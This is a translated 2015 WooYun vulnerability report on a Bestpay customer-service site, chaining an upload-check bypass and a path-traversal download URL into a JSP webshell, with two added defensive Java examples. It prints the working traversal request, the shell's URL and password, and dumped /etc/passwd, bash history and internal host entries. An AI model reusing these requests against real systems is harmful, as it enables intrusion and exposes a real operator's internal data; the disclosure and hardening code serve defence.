
Vulnerability summary

Defect ID: wooyun-2015-094857

Title: A Bestpay (翼支付) site: from upload bypass to arbitrary file download to getshell

Vendor: bestpay.com.cn

Author: BMa

Submitted: 2015-01-31 11:56

Fixed: 2015-03-17 11:58

Published: 2015-03-17 11:58

Vulnerability type: arbitrary file traversal/download

Severity: High

Self-assessed Rank: 14

Status: confirmed by vendor

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2015-01-31: Details sent to the vendor, awaiting vendor handling
2015-02-02: Vendor confirmed; details disclosed to the vendor only
2015-02-12: Details disclosed to core white hats and experts in the field
2015-02-22: Details disclosed to regular white hats
2015-03-04: Details disclosed to intern white hats
2015-03-17: Details disclosed to the public

Brief description:

A Bestpay (翼支付) site: from upload bypass to arbitrary file download to getshell

Detailed description:

Site: http://kf.bestpay.com.cn, the customer service system of Tianyi E-Commerce (天翼电子商务公司)
Chat with a customer service rep: http://kf.bestpay.com.cn/zhij/imsystem/im/im_client.jsp?queueId=1011&guestId=&sessionId=&keyword=
There is a file upload here:

[Screenshot: 0.jpg]


As the screenshot shows, there is a restriction on the upload; by truncating and modifying the request, the check was bypassed and a jsp file was uploaded.

[Screenshot: 1.jpg]


After uploading there was a serious problem: no way to find the shell's path. Nothing was returned, no similar path was exposed anywhere, it could not be crawled, Google was no help, and no other site with a similar structure could be found.
With no other option, I chatted with the customer service rep for a while (incidentally, the rep's attitude was excellent and she was a huge help; sincere thanks), got her to download the file, and had her send me the download link:

http://kf.bestpay.com.cn/zhij/imsystem/download.jsp?&msgDirection=1&path=20150129113305618_1.jsp&realFileName=1.jsp


Obviously this is an arbitrary file download. Testing it:

http://kf.bestpay.com.cn/zhij/imsystem/download.jsp?&msgDirection=1&path=/../../download.jsp&realFileName=1.jsp


[Screenshot: 2.jpg]
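Added example, not code from the report or from the bestpay application: a small Java scan over constructed access-log lines in the shape of the download request above. It flags any query parameter whose URL-decoded value contains "../", begins with "/", or carries a NUL byte, which is the pattern a defender would alert on for an endpoint like download.jsp. The class name TraversalLogScan, the common-log-format layout and the three sample lines are assumptions.

```java
import java.net.URLDecoder;
import java.nio.charset.StandardCharsets;
import java.util.ArrayList;
import java.util.List;
import java.util.regex.Matcher;
import java.util.regex.Pattern;

/** Hypothetical detector for path-traversal attempts in web access logs (not part of any real project). */
public final class TraversalLogScan {

    // Request field of a common-log-format line: "GET /path?query HTTP/1.1"
    private static final Pattern REQUEST = Pattern.compile("\"(?:GET|POST) (\\S+) HTTP/[0-9.]+\"");

    /** Returns the names of query parameters whose decoded value tries to leave the intended directory. */
    public static List<String> suspiciousParams(String logLine) {
        List<String> hits = new ArrayList<>();
        Matcher m = REQUEST.matcher(logLine);
        if (!m.find()) {
            return hits;                       // not a request line we understand
        }
        String target = m.group(1);
        int q = target.indexOf('?');
        if (q < 0) {
            return hits;                       // no query string, nothing to inspect
        }
        for (String pair : target.substring(q + 1).split("&")) {
            if (pair.isEmpty()) {
                continue;                      // tolerates the "?&msgDirection=1" shape seen in the report
            }
            int eq = pair.indexOf('=');
            String key = eq < 0 ? pair : pair.substring(0, eq);
            String raw = eq < 0 ? "" : pair.substring(eq + 1);
            // Normalise backslashes so "..\" is judged the same way as "../"
            String value = decodeTwice(raw).replace('\\', '/');
            if (value.contains("../") || value.startsWith("/") || value.indexOf('\0') >= 0) {
                hits.add(key);
            }
        }
        return hits;
    }

    // Decode twice so double-encoded sequences such as "%252e%252e%2f" are also caught.
    private static String decodeTwice(String s) {
        return safeDecode(safeDecode(s));
    }

    private static String safeDecode(String s) {
        try {
            return URLDecoder.decode(s, StandardCharsets.UTF_8);
        } catch (IllegalArgumentException e) {
            return s;                          // malformed %-escape: keep the raw value
        }
    }

    public static void main(String[] args) {
        // Constructed sample lines modelled on the request in the report; these are not real server logs.
        String[] sample = {
            "10.0.0.5 - - [29/Jan/2015:11:33:05 +0800] \"GET /zhij/imsystem/download.jsp?&msgDirection=1&path=20150129113305618_1.jsp&realFileName=1.jsp HTTP/1.1\" 200 1234",
            "10.0.0.5 - - [29/Jan/2015:11:40:12 +0800] \"GET /zhij/imsystem/download.jsp?&msgDirection=1&path=/../../download.jsp&realFileName=1.jsp HTTP/1.1\" 200 5678",
            "10.0.0.5 - - [29/Jan/2015:11:41:02 +0800] \"GET /zhij/imsystem/download.jsp?path=%2e%2e%2f%2e%2e%2fWEB-INF%2fweb.xml HTTP/1.1\" 200 910"
        };
        for (String line : sample) {
            System.out.println(suspiciousParams(line) + "  <-  " + line);
        }
    }
}
```

The first sample line carries a plain stored file name and produces no hit; the second and third flag the path parameter, the third only because the value is decoded before inspection. In a real deployment the same check would run on the decoded parameter inside the download handler as well, since log-based detection only tells you after the fact.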


The usual pentest approach was stuck (experts, please teach me), so the only option left was to use the download vulnerability to analyze the source code (only .jsp and the like could be downloaded; .class and similar extensions could not). Thanks to my good friend Xiaopang (@subversion), an excellent Java/JSP developer who also likes security.
Found the send-file path: /sendfile/client/
Putting it together gives the shell: http://kf.bestpay.com.cn/zhij/imsystem/sendfile/client/20150129113305618_1.jsp, password: jspspy
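Added example, not code from the report or from the bestpay application: one Java class showing how both weak points in this chain are normally closed on the server side. The client-supplied file name on upload is reduced to a whitelisted extension and replaced by a server-generated name (so a truncated or double-extension name cannot land a .jsp in a directory the container executes), and the "path" parameter on download is confined to a single directory after normalization and symlink resolution. The class name SafeFileStore, the extension whitelist and the upload directory are assumptions; the real application's layout is only known from the /sendfile/client/ path above.

```java
import java.io.ByteArrayInputStream;
import java.io.IOException;
import java.io.InputStream;
import java.nio.file.Files;
import java.nio.file.Path;
import java.nio.file.StandardCopyOption;
import java.util.Locale;
import java.util.Set;
import java.util.UUID;

/** Hypothetical hardened upload/download store; not the bestpay application's code. */
public final class SafeFileStore {

    // Assumed whitelist: types the servlet container will never execute.
    private static final Set<String> ALLOWED_EXTENSIONS = Set.of("jpg", "jpeg", "png", "gif", "pdf", "txt");

    private final Path baseDir;   // the only directory uploads are written to and read from

    public SafeFileStore(Path baseDir) throws IOException {
        this.baseDir = baseDir.toRealPath();   // absolute, symlinks resolved; must exist
    }

    /** Validates a client-supplied name on the server; the browser-side check is not trusted. */
    public static String validatedExtension(String clientFileName) {
        if (clientFileName == null || clientFileName.indexOf('\0') >= 0) {
            throw new IllegalArgumentException("invalid file name");   // NUL would let check and stored name disagree
        }
        String name = clientFileName.replace('\\', '/');
        name = name.substring(name.lastIndexOf('/') + 1);             // drop any directory part
        int dot = name.lastIndexOf('.');
        if (dot < 0 || dot == name.length() - 1) {
            throw new IllegalArgumentException("missing extension");
        }
        String ext = name.substring(dot + 1).toLowerCase(Locale.ROOT);   // judged on the LAST extension
        if (!ALLOWED_EXTENSIONS.contains(ext)) {
            throw new IllegalArgumentException("extension not allowed: " + ext);
        }
        return ext;
    }

    /** Stores an upload under a server-generated name and returns that name for later download requests. */
    public String store(String clientFileName, InputStream data) throws IOException {
        String ext = validatedExtension(clientFileName);
        String stored = UUID.randomUUID().toString() + "." + ext;     // the client never chooses the path
        Files.copy(data, baseDir.resolve(stored), StandardCopyOption.REPLACE_EXISTING);
        return stored;
    }

    /** Resolves a download request: the value must name a file directly inside baseDir. */
    public Path resolveDownload(String requested) throws IOException {
        if (requested == null || requested.isEmpty() || requested.indexOf('\0') >= 0) {
            throw new IllegalArgumentException("invalid path");
        }
        // resolve() keeps an absolute argument as-is, so "/../../download.jsp" normalizes to "/download.jsp"
        // and fails the containment check below; "../x" is folded out of baseDir and fails too.
        Path candidate = baseDir.resolve(requested).normalize();
        if (!candidate.startsWith(baseDir) || !baseDir.equals(candidate.getParent())) {
            throw new IllegalArgumentException("path escapes upload directory: " + requested);
        }
        Path real = candidate.toRealPath();    // follows symlinks; throws if the file does not exist
        if (!real.startsWith(baseDir)) {
            throw new IllegalArgumentException("symlink escapes upload directory");
        }
        return real;
    }

    public static void main(String[] args) throws IOException {
        Path tmp = Files.createTempDirectory("uploads");   // stand-in for the real upload directory
        SafeFileStore store = new SafeFileStore(tmp);
        String stored = store.store("avatar.jpg", new ByteArrayInputStream(new byte[] {1, 2, 3}));
        System.out.println("stored as " + stored + " -> " + store.resolveDownload(stored));
        for (String name : new String[] {"shell.jsp", "shell.jsp\0.jpg"}) {
            try {
                validatedExtension(name);
                System.out.println("accepted upload name: " + name);
            } catch (IllegalArgumentException e) {
                System.out.println("rejected upload name: " + e.getMessage());
            }
        }
        for (String p : new String[] {"/../../download.jsp", "../WEB-INF/web.xml"}) {
            try {
                store.resolveDownload(p);
                System.out.println("accepted download path: " + p);
            } catch (IllegalArgumentException e) {
                System.out.println("rejected download path: " + e.getMessage());
            }
        }
    }
}
```

Two design points matter more than the individual checks: the download handler never trusts a client-supplied path at all (only an opaque name it issued itself), and the upload directory is kept outside the servlet container's web application so that even a mis-validated file is served as bytes rather than compiled as a JSP.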

[Screenshot: 3.jpg]


Database: not dumping it is my rule.

[Screenshot: 4.jpg]


The privileges appear to be fairly broad:

[Screenshot: 5.jpg]


Executing: cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
#games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
#ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
#nobody:x:99:99:Nobody:/:/sbin/nologin
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
pcap:x:77:77::/var/arpwatch:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
avahi:x:70:70:Avahi daemon:/:/sbin/nologin
rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
oprofile:x:16:16:Special user account to be used by OProfile:/home/oprofile:/sbin/nologin
xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
avahi-autoipd:x:100:156:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin
gdm:x:42:42::/var/gdm:/sbin/nologin
sabayon:x:86:86:Sabayon user:/home/sabayon:/sbin/nologin
webapp:x:501:501::/home/webapp:/bin/bash
kefu_remote:x:502:10::/home/kefu_remote:/bin/bash
fengkong:x:503:505::/webapp/tykf2/upload/fengkong:/sbin/nologin


Executing: cat /home/webapp/.bash_history
cd /
cd web*
ll
cd tykf
ll
cd tykf3
cd tykf*3
cd ..bin
ll
cd bin
cd ../bin
cd ..
cd webapp
cd web*
ll
rm -rf WebReport2013070901
cd ../
ll
cd in
cd bin
ll
./sh*.sh
cd ../
ll
cd web*
ll
rm -rf *2013*
ll
cd ../bin
ll
./sta*.sh
cd ../logs
tail -f *.out
cd /
cd web*
ll
cd tykf
ll
cd tykf*3
ll
cd bin
./shutdown.sh
ll
./startup.sh
ps -ef|grep java
cd /
ll
cd web*
ll
cd tykf
cd tykf*2
cd bin
ps -ef |grep java
kill -9 15894
ps -ef |grep java
./sta*.sh
cd ../logs
tail -f *.out
cd /webapp/tykf/tykf_tomcat_4/bin
pwd
ps -ef | grep java
kill -9 12647
ps -ef | grep java
./startup.sh
cd ../
cd logs
tail -f catalina.out
ps -ef | grep java
df -h
cd /webapp/tykf/tykf_tomcat_1/logs
echo > catalina.out
df -h
tar -cvvf /webapp/tykf/data_bak/CustomerService20141126_01.tar.gz /webapp/tykf/tykf_tomcat_2/webapps/CustomerService/
cd /webapp/tykf/tykf_tomcat_4/bin
pwd
ps -ef | grep java
kill -9 22736
./startup.sh
cd ../
cd logs
tail -f catalina.out
cd ../
cd ../
cd /webapp/tykf/tykf_tomcat_2/bin
pwd
ps -ef | grep java
kill -9 24469
ps -ef | grep java
./startup.sh
ps -ef | grep java
cd ../
cd logs
tail -f catalina.out
cd /webapp/tykf/tykf_tomcat_4/work
pwd
ps -ef | grep java
pwd
kill -9 26494
ps -ef | grep java
rm -rf Catalina/
ll
cd ../
cd bin
./startup.sh
cd ../
cd logs
tail -f catalina.out
cd /
cd web*
ll
cd tykf
cd tykf*4
cd logs
tail -f *.out
cd /webapp/tykf/tykf_tomcat_4/logs
tail -f catalina.out
tail -f catalina.out
cd /
ll
cd web*
ll
cd tykf
cd tykf*4
cd bin
ps -ef |grep java
kill -9 24656
ps -ef |grep java
./sta*.sh
cd ../logs
tail -f *.out
CD ../
cd ../
cd ../
cd tykf*2
cd bin
ps -ef |grep java
kill -9 7220
./sta*.sh
cd ../logs
tail -f *.out
df -h
df -h
tail -f *.out
cd ../
ll
cd ../
ll
cd tykf*1
cd logs
tail -f *.out
cd ../
cd bin
ps -ef |grep java
kill -9 5462
ps -ef |grep java
./sta*.sh
cd ../logs
tail -f *.out
ps -ef |grep java
cd ../
ll
cd ../
cd tykf*2
cd ../logs
ll
cd ../
ll
cd tykf*2
cd logs
tail -f *.out
cd /webapp/tykf/tykf_tomcat_2/bin
pwd
top
pwd
ps -ef | grep java
kill -9 26605
ps -ef | grep java
./startup.sh
ps -ef | grep java
cd ../
cd logs
tail -f catalina.out
cd /
ll
cd web*
ll
cd tykf*1
cd tykf
cd tykf*1
cd logs
tail -f *.out
CD ../
cd ../
cd bin
ps -ef |grep java
kill -9 26319
ps -ef |grep java
./sta*.sh
cd ../logs
tail -f *.out
cd /
cd web*
ll
cd tykf
cd tykf*4
cd bin
ps -ef |grep java
kill -9 27076
./sta*.sh
cd ../logs
tail -f *.out
df -h
cd /webapp/tykf/tykf_tomcat_1/logs
pwd
echo > catalina.out
cd /webapp/tykf/tykf_tomcat_4/logs
pwd
echo > catalina.out
pwd
df -h
top
pe -ef | grep java
ps -ef | grep java
ps -ef |grep java
cd /webapp/tykf/tykf_tomcat_2/bin
pwd
pwd
ps -ef | grep java
kill -9 3533
ps -ef | grep java
./startup.sh
cd ..
cd logs
tail -f catalina.out
top
free
cd /webapp/tykf/tykf_tomcat_1/bin
pwd
ps -ef | grep java
kill -9 3687
ps -ef | grep java
./startup.sh
cd ../
cd logs
tail -f catalina.out
ps -ef | grep java
ps -ef | grep java
cd /
ll
cde web*
ll
cd tykf
cd web*
ll
cd tykf
cd tykf*4
cd bin
ps -ef |grep java
kill -9 31606
ps -ef |grep java
./sta*.sh
cd ../logs
tail -f *.out
ls
cd /
ll
cd web*
ll
cd tykf
cd tykf*1
ll
cd web*
ll
cd zhij
ll
cd im*
ll
cd ../
cd ims*
ll
cd im
ll
ll -a
rm - rf .svn
rm -fr .svn
ll
ll -a
cd ../
ll
ll -a
rm -fr .svn
ll -a
cd ../
ll -a
cd imcd g*
cd g*
ll -a
cd ../
cd /webapp/tykf/tykf_tomcat_4/bin
pwd
pwd
ps -ef | grep java
kill -9 15585
./startup.sh
ps -ef | grep java
cd ../
cd logs
tail -f catalina.out
df -h
ping 183.63.191.47
cd /
ll
cd web*
ll
cd tykf
ll
cd tykf*1
cd logs
tail ~-f *.out
tail -f *.out
cd /webapp/tykf/tykf_tomcat_4/bin
pwd
ps -ef | grep java
kill -9 22868
ps -ef | grep java
./startup.sh
cd ../
cd logs
tail -f catalina.out
ps -ef | grep java
ps -ef | grep java
df -h
cd /webapp/tykf/tykf_tomcat_4/logs
pwd
echo > catalina.out
ps -ef | grep java
cd /webapp/tykf/tykf_tomcat_1/logs
pwd
pwd
echo > catalina.out
ps -ef | grep java
ps -ef | grep java
df -h
top
cd /
ll
cd web*
ll
cd tykf
ll
cd tykf*5
cd logs
tail -f *.out
cd ../
cd bin
ps -ef |grep java
kill -9 23355
./sta*.sh
cd ../logs
tail -t *.out
tail -f *.out
cd /
ll
cd web*
ll
cd tykf
cd tykf*1
cd lgos
cd log
cd logs
tail -f *.out
tail -f *.out
ping 172.16.248.123
telnet 172.16.248.123 8090
telnet 172.16.248.123 8090
telnet 172.16.248.123 8080
cd /
ll
cd web*
ll
cd tykf
cd tykf*1
cd logs
tail -f *.out
tail -f *.out
cd /webapp/tykf/tykf_tomcat_4/bin
pwd
pwd
ps -ef | grep java
kill -9 32625
ps -ef | grep java
./startup.sh
cd ../
cd logs
ps -ef | grep java
ps -ef | grep java
tail -f catalina.out
dh -f
df -h
cd /webapp/tykf/tykf_tomcat_2/logs
pwd
echo > catalina.out
df -h
date
date
date
cd /
cd web *
cd/
dh -f
df -h
tar -cvvf /webapp/tykf/data_bak/zhij20141222_01.tar.gz /webapp/tykf/tykf_tomcat_1/webapps/zhij/
cd tar -cvvf /webapp/tykf/data_bak/CustomerService20141222_01.tar.gz /webapp/tykf/tykf_tomcat_2/webapps/CustomerService/
tar -cvvf /webapp/tykf/data_bak/CustomerService20141222_01.tar.gz /webapp/tykf/tykf_tomcat_2/webapps/CustomerService/
cd /webapp/tykf/tykf_tomcat_2
ps -ef | grep java
pwd
pwd
ps -ef | grep java
kill -9 23665
ps -ef | grep java
cd lib
cd ../
cd bin
./startup.sh
cd ../
cd logs
tail -f catalina.out
cd /webapp/tykf/tykf_tomcat_2/work
pwd
pwd
pwd
ps -ef | grep java
kill -9 341
ps -ef | grep java
rm -rf Catalina/
ll
cd ../
cd bin
./startup.sh
cd ../
cd logs
tail -f catalina.out
cd /webapp/tykf/tykf_tomcat_1/bin
pwd
ps -ef | grep java
kill -9 1997
ps -ef | grep java
./startup.sh
cd ../
cd logs
tail -f catalina.out
df -h
cd /webapp/tykf/tykf_tomcat_1/logs
pwd
echo > catalina.out
df -h
df -h
df -h
df -h
df -h
df -h
cd /webapp/tykf/tykf_tomcat_1/bin
pwd
pwd
ps -ef | grep java
ps -ef | grep java
kill -9 787
ps -ef | grep java
ps -ef | grep java
./startup.sh
cd ../
cd logs
tail -f catalina.out
cd /webapp/tykf/tykf_tomcat_1/bin
pwd
ps -ef | grep java
kill -9 10418
ps -ef | grep java
./startup.sh
cd ..
cd logs
tail -f catalina.out
ps -ef | grep java
ps -ef | grep java
ps -ef | grep java
dh -f
df -h
ps -ef | grep java
ps -ef | grep java
ps -ef | grep java
ps -ef | grep java
ps -ef | grep java
cd /
ll
cd web*
ll
cd tykf
cd tykf*3
ll
cd web*
ll
cd ../bin
ps -ef |grep java
ps -ef |grep java
kill -9 28990
./sta*.sh
cd ../logs
tail -f *.out
d /
cd /
ll
cd web*
ll
cd tykf
cd tykf*4
cd bin
ps -ef |grep java
kill -9 17366
./sta*.sh
cd ../logs
tail -f *.out
cd /
cd /
ll
cd web*
ll
cd tykf
cd tykf*1
cd bin
cd ../logs
tail -f *.out
cd ../bin
ps -ef |grep jaVA
ps -ef |grep java
kill -9 10764
ps -ef |grep java
./sta*.sh
cd ../logs
tail -f *.out
df- h
dh -f
dh -f
df -h
df -h
df -h
df -h
df -h
df -h
df -h
df -h
df -h
df -h
df -h
cd /webapp/tykf/tykf_tomcat_1/logs
pwd
echo > catalina.out
df -h
df -h
df -h
df -h
df -h
df -h
cd /webapp/tykf/tykf_tomcat_4/logs
tail -f catalina.
tail -f catalina.out
cd /
ll
cd web*
cd tykf
cd tykf*5
cd bin
cd /webapp/tykf/tykf_tomcat_4/bin
pwd
pwd
ps -ef | grep java
kill -9 25027
ps -ef | grep java
./startup.sh
ps -ef | grep java
cd ../
cd logs
tail -f catalina.out
cd /webapp/tykf/tykf_tomcat_4/bin
pwd
pwd
ps -ef | grep java
kill -9 32504
ps -ef | grep java
./startup.sh
cd ../
cd logs
tail -f catalina.out
ps -ef | grep java
cd /
ll
cd web*
ll
cd tykf
cd tykf*5
cd bin
ps -ef |grep java
kill -9 9155
ps -ef |grep java
./sta*.sh
cd ../logs
tail -f *.out
cd ../
cd ../
cd tykf*1
cd bin
ps -ef |grep java
kill -9 30983
ps -ef |grep java
./sta*.sh
cd ../logs
tail -f *.out
ps -ef |grep java
tail -f *.out
cd ../
cd ../
cd tykf*5
cd logs
tail -f *.out
tail -f *.out
CD ../
cd ../
cd ../
cd tykf*4
cd logs
tail -f *.out
cd ?
cd /
ll
cd web*
ll
cd tykf
ll
cd tykf*4
cd logs
tail -f *.out
tail -f *.out
tail -f *.out
cd ../
cd /
cd web*
ll
cd tykf
ll
cd tykf*4
cd logs
tail -f *.ouy\t
tail -f *.out
tail -f *.out
tail -f *.out
df -h
top
ps -ef |grep java
cd /
ll
cd web*
ll
cd tykf
ll
cd tykf*4
cd web*
ll
ll -h
ll
cd blazer*
ll
cd ../
cd /
cd /
ps -ef |grep java
ps -ef |grep java
cd web*
ll
cd tykf
ll
cd tykf*6
cd web*
ll
cd ../
cd web*
rm -rf *
cd /
ll
cd web8
cd web*
ll
cd tykf
cd tykf*6
cd bin
ps -ef |grep java
ps -ef |grep java
./sta*.sh
cd ../logs
tail -f *.out
date
cd /webapp/tykf/tykf_tomcat_4/bin
pwd
ps -ef | grep java
kill -9 7231
ps -ef | grep java
./startup.sh
ps -ef | grep java
cd ../
cd logs
tail -f catalina.out
cd /
cd tykf
ll
cd web*
cd tykf
ll
cd tykf86
cd tykf*6
cd logs
tail -f *.out
tail -f *.out
date
tail -f *.out
ps -ef |grep java
tail -f *.out
cd ../bin
ll
cd ../
cd bin
./sh*.sh
ps -ef |grep java
cd ../logs
tail -f *.out
tail -f *.out
tail -f *.out
ps -ef |grep java
cd ../bin
./sta*.sh
cd ../logs
tail -f *.out
cd /
cd web*
ll
cd tykf
cd tykf*6
cd logs
tail -f *.out
ps -ef |grep java
tail -f *.out
cd ../
cd bin
./sh*.sh
ps -ef |grep java
./sta*.sh
cd ../logs
tail -f *.out
ps -ef |grep java
tail -f *.out
tail -f *.out
date
date
date
cd /
ll
cd web*
ll
cd tykf*
l
ll
cd tykf84
cd tykf84
cd tykf*4
cd logs
tail -f *.out
ls
cd /
ll
cd web*
ll
cd tykf
cd tykf*4
cd logs
tail -f *.out
tail -f *.out
tail -f *.out
cd /
ll
cd web*
ll
cd tykf
ll
cd tykf*6
cd bin
ps -ef |grep java
kill -9 14621
ps -ef |grep java
./sta*.sh
cd ../logs
tail -f *.out
ps -ef |grep java
cd /webapp/tykf/tykf_tomcat_4/bin
pwd
ps -ef | grep java
kill -9 29427
ps -ef | grep java
./startup.sh
ps -ef | grep java
cd ../
cd logs
tail -f catalina.out
telnet 172.16.248.128 8080
telnet 172.16.248.128 8081
telnet 172.16.248.128 8080
ping http://172.16.248.128:8080
ping 172.16.248.128:8080
ping 172.16.248.128 8080
ping 172.16.248.128 8080
ping 172.16.248.128
df -h
cd /webapp/tykf/tykf_tomcat_4/logs
pwd
echo > catalina.out
echo > catalina.out
cd /webapp/tykf/tykf_tomcat_2/logs
pwd
echo > catalina.out
cd /webapp/tykf/tykf_tomcat_1/logs
pwd
echo > catalina.out
echo > catalina.out
df -h
cd /webapp/tykf/tykf_tomcat_5/logs
pwd
echo > catalina.out
df -h
ps -ef | grep java
find /webapp/tykf2/robot
find /webapp/tykf2/robot -mtime +30 -type f -name *.sh[ab] -exec rm -f {} \;
ps -ef | grep java
pwd
cd find /webapp/tykf2/robot -mtime +30 -type f -name *.sh[ab] -exec rm -f {} \;
cd /webapp/tykf2
ll
cd robot
find -type f | wc -l
cd find /webapp/tykf2/robot -mtime +30 -type f -name *.sh[ab] -exec rm -f {} \;
find /webapp/tykf2/robot -mtime +30 -type f -name *.sh[ab] -exec rm -f {} \;
find -type f | wc -l
find /webapp/tykf2/robot -type f -mtime+30 -exec rm {} \;
find /webapp/tykf2/robot -type f -mtime +30 -exec rm {} \;
pwd
find -type f | wc -l
ps -ef | grep java
pwd
pwd
find /webapp/tykf2/robot -type f -mtime +30 -exec rm {} \;
find -type f | wc -l
find /webapp/tykf2/robot -type f -mtime +30 -exec rm {} \;
find -type f | wc -l
find /webapp/tykf2/robot -type f -mtime +30 -exec rm {} \;
find -type f | wc -l
find -type f | wc -l
find /webapp/tykf2/robot -type f -mtime +30 -exec rm {} \;
find -type f | wc -l
top
df -h
cd /webapp/tykf/tykf_tomcat_4/bin
pwd
ps -ef | grep java
kill -9 16675
ps -ef | grep java
./startup.sh
ps -ef | grep java
ps -ef | grep java
cd ../
cd logs
tial -f catalina.out
tail -f catalina.out
cd /
ll
cd web*
ll
cd tykf
ll
cd tykf*5
ll
cd logs
ll -h
rm -rf 2014*.txt
ll
rm -rf l*2014*.txt
ll
rm -rf E*2014*.log
ll
echo > catalina.out
ll -h
cd ../bin
ps -ef |grep java
kill -9 28239
./sta*.sh
cd ../logs
tail -f *.out
tail -f *.out
cd ../
ll
cd ../
ll
cd tykf*2
cd logs
tail -f *.out
cde /
cd /
ll
ps -ef |grep java
cd /
ll
cd web*
ll
cd tykf
ll
cd tykf*5
cd ../
cd tykf*4
cd bin
ps -ef |grep java
kill -913880
kill -9 13880
./sta*.sh
cd ../lgosta
cd ../logs
tail -f *.out
ps -ef |grep java
ps -ef |grep java
cd /
ll
cd web*
ll
cd tykf
ll
cd tykf*6
ll
cd bin
ll
cd ../
ll
cd bin
./sh*.sh
ps -ef |grep java
./sh*.sh
ps -ef |grep java
./sta*.sh
cd ../logs
tail -f *.out
df -h
cd /
ll
cd web*
ll
cd tykf*
ll
cd tykf*6
cd bin
ps -ef |grep java
./sh*.sh
ps -ef |grep java
./sta*.sh
cd ../logs
tail -f *.out
cd /
ll
ps -ef |grep java
cd /
ll
ps -ef | grep sftp
ftp
ftp 127.0.0.1
ps -ef | grep java
ps -ef | grep vsftpd
su root
su root
su
su - root
command not found
service vsftpd stop
eixt
pwd
ls
grep fengkong /etc/passwd
cd /webapp/tykf2/upload/fengkong
ll -d .
cp qq??20141206104355_201412061044.jpg test123.jpg
cd ..
ll fengkong/
ll -d fengkong/
cd fengkong/
chown o+w test123.jpg
chmod o+w test123.jpg
ll test123.jpg
cd ..
exit


Executing: cat /etc/hosts
# Do not remove the following line, or various programs
# that require network functionality will fail.
127.0.0.1 localhost.localdomain localhost
::1 localhost6.localdomain6 localhost6
172.17.66.11 kfdb1
172.17.66.13 kfdb2
172.17.66.12 vip_kfdb1
172.17.66.14 vip_kfdb2


Proof of vulnerability:

Stopped here; did not go any deeper.

Fix recommendation:

Copyright notice: when reposting, please credit the source: BMa@乌云 (WooYun)


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 20

Confirmed: 2015-02-02 23:47

Vendor reply:

Thanks for the testing; the relevant staff have been notified to carry out the fix.

Latest status:

None yet